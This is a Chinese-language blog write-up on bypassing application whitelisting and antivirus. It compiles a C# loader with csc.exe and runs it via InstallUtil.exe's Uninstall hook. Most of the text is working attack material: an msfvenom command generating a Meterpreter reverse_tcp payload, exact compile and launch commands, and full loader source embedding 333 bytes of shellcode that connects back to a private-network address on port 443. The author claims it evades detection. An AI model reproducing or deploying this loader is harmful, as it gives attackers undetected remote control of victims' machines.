个人记录丨csharp 编译文件绕过防病毒软件利用手法分析

首页图

部分安全软件为了保障用户PC系统环境安全，会建立一个应用程序白名单，在特定情况下PC只允许指定的白名单中的应用程序启动执行。这里整理网上一些绕过应用程序白名单技巧进行分析，学习其中的对抗手法。

1. 下载 csharp 文件，InstallUtil-ShellCode-cs用于替换ShellCode。

2. 利用msfvenom生成一个msf的 csharp 格式ShellCode，ShellCode为后面二次编译恶意程序做准备。

msfvenom -p windows/meterpreter/reverse_tcp lhost = YOUR_IP lport = 443 -fcsharp> shellcode.txt

3. InstallUtil-ShellCode-cs代码中有一个函数为Uninstall，当位于白名单中的InstallUtil.exe执行起来后，会调用Uninstall函数，函数中执行恶意ShellCode。之前用msfvenom生成的csharp 格式ShellCode就是为了替换默认的ShellCode代码。

4. 利用csc.exe二次编译恶意程序，根据文中演示生成的恶意程序未被杀软检出。

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe  InstallUtil-ShellCode.cs

5. 通过installUtill执行加载二次编译的恶意程序，通过/U调用exeshell.exe中的包含恶意ShellCode的Uninstall函数。

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

利用InstallUtil.exe绕过应用程序白名单很早之前就有曝光过，而上述的绕过手法不同在于它利用csharp格式ShellCode编译文件生成恶意程序。

一般情况利用InstallUtil.exe执行恶意程序，也是利用msf生成shellcode，执行shellcode。

步骤：

Step One:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
Step Two:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

C#加载ShllCode

using System;  
using System.Runtime.InteropServices;  
namespace TCPMeterpreterProcess  
{  
    class Program  
    {  
        static void Main(string[] args)  
        {  
            // native function’s compiled code  
            // generated with metasploit  
            byte[] shellcode = new byte[333] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x70,0x83,0x68,0x02,
0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,
0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,
0x53,0xff,0xd5 };
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);  
            IntPtr hThread = IntPtr.Zero;  
            UInt32 threadId = 0;  
            // prepare data  
            IntPtr pinfo = IntPtr.Zero;  
            // execute native code  
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);  
            WaitForSingleObject(hThread, 0xFFFFFFFF);  
}  
        private static UInt32 MEM_COMMIT = 0x1000;  
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;  
[DllImport("kernel32")]  
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,  
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);  
[DllImport("kernel32")]  
        private static extern bool VirtualFree(IntPtr lpAddress,  
UInt32 dwSize, UInt32 dwFreeType);  
[DllImport("kernel32")]  
        private static extern IntPtr CreateThread(  
UInt32 lpThreadAttributes,  
UInt32 dwStackSize,  
UInt32 lpStartAddress,  
IntPtr param,  
UInt32 dwCreationFlags,  
ref UInt32 lpThreadId  
);  
[DllImport("kernel32")]  
        private static extern bool CloseHandle(IntPtr handle);  
[DllImport("kernel32")]  
        private static extern UInt32 WaitForSingleObject(  
IntPtr hHandle,  
UInt32 dwMilliseconds  
);  
[DllImport("kernel32")]  
        private static extern IntPtr GetModuleHandle(  
string moduleName  
);  
[DllImport("kernel32")]  
        private static extern UInt32 GetProcAddress(  
IntPtr hModule,  
string procName  
);  
[DllImport("kernel32")]  
        private static extern UInt32 LoadLibrary(  
string lpFileName  
);  
[DllImport("kernel32")]  
        private static extern UInt32 GetLastError();  
}  
}  

exeshell.exe

using System;  
using System.Windows.Forms;  
class HelloWorld{  
       public static void Main(){  
            MessageBox.Show("Main函数");  
       }  
}  

[System.ComponentModel.RunInstaller(true)]
public class Sample:System.Configuration.Install.Installer
{
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        // ShellCode代码
    }
}

利用代码

using System;  
using System.Runtime.InteropServices;  
using System.Windows.Forms;  
namespace TCPMeterpreterProcess  
{
    public class Shellcode
    {
        public static void Exec()
        {
            // native function’s compiled code  
            // generated with metasploit  
            byte[] shellcode = new byte[333] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x70,0x83,0x68,0x02,
0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,
0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,
0x53,0xff,0xd5 };
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);  
            IntPtr hThread = IntPtr.Zero;  
            UInt32 threadId = 0;  
            // prepare data  
            IntPtr pinfo = IntPtr.Zero;  
            // execute native code  
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);  
            WaitForSingleObject(hThread, 0xFFFFFFFF); 
        }
        private static UInt32 MEM_COMMIT = 0x1000;  
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;  
        [DllImport("kernel32")]  
                private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,  
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);  
        [DllImport("kernel32")]  
                private static extern bool VirtualFree(IntPtr lpAddress,  
        UInt32 dwSize, UInt32 dwFreeType);  
        [DllImport("kernel32")]  
                private static extern IntPtr CreateThread(  
        UInt32 lpThreadAttributes,  
        UInt32 dwStackSize,  
        UInt32 lpStartAddress,  
        IntPtr param,  
        UInt32 dwCreationFlags,  
        ref UInt32 lpThreadId  
        );  
        [DllImport("kernel32")]  
                private static extern bool CloseHandle(IntPtr handle);  
        [DllImport("kernel32")]  
                private static extern UInt32 WaitForSingleObject(  
        IntPtr hHandle,  
        UInt32 dwMilliseconds  
        );  
        [DllImport("kernel32")]  
                private static extern IntPtr GetModuleHandle(  
        string moduleName  
        );  
        [DllImport("kernel32")]  
                private static extern UInt32 GetProcAddress(  
        IntPtr hModule,  
        string procName  
        );  
        [DllImport("kernel32")]  
                private static extern UInt32 LoadLibrary(  
        string lpFileName  
        );  
        [DllImport("kernel32")]  
                private static extern UInt32 GetLastError();  
    }  

    [System.ComponentModel.RunInstaller(true)]
    public class Sample:System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            // ShellCode代码
            Shellcode.Exec();
        }
    }
    
    class Program  
    {
        static void Main(string[] args)  
        {  
            MessageBox.Show("通过 csharp 编译文件绕过防病毒软件");
        }  
        
    }  
}  

绕过流程图

绕过流程图